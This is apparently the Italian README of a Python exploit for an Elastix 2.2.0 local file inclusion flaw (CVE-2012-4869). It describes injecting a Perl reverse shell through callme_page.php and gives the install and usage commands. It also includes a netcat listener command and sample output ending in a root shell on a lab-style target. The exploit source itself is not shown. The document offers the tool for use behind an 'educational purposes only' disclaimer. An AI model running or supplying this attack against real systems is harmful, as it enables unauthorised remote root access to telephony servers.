
Script di exploit in Python per la vulnerabilità LFI di Elastix 2.2.0 (CVE-2012-4869) che consente l'esecuzione remota di codice tramite l'iniezione di un payload di reverse shell in Perl.
Questo script sfrutta una vulnerabilità di inclusione locale di file (LFI) in Elastix 2.2.0, consentendo l'esecuzione remota di codice (RCE) tramite l'iniezione di comandi attraverso l'endpoint callme_page.php. L'exploit si basa su CVE-2012-4869.
requestsInstalla le dipendenze usando:
pip install requests
python exploit.py <URL> --LHOST <YOUR_IP> --LPORT <YOUR_PORT>
python exploit.py "https://10.129.229.183" --LHOST "10.10.14.23" --LPORT 9001
Prima di eseguire l'exploit, avvia un listener Netcat sulla tua macchina:
nc -lvnp 9001
[*] Running Elastix 2.2.0 LFI Exploit - CVE-2012-4869
[*] Target: https://10.129.229.183
[*] Listening on 10.10.14.23:9001
[+] Exploit sent successfully, waiting for reverse shell...
[+] Connection from 10.129.229.183:41242
$ id
uid=0(root) gid=0(root) groups=0(root)
Questo exploit ha esclusivamente scopi educativi e di test di sicurezza autorizzati. L'uso non autorizzato è illegale. L'autore non è responsabile dell'uso improprio di questo strumento.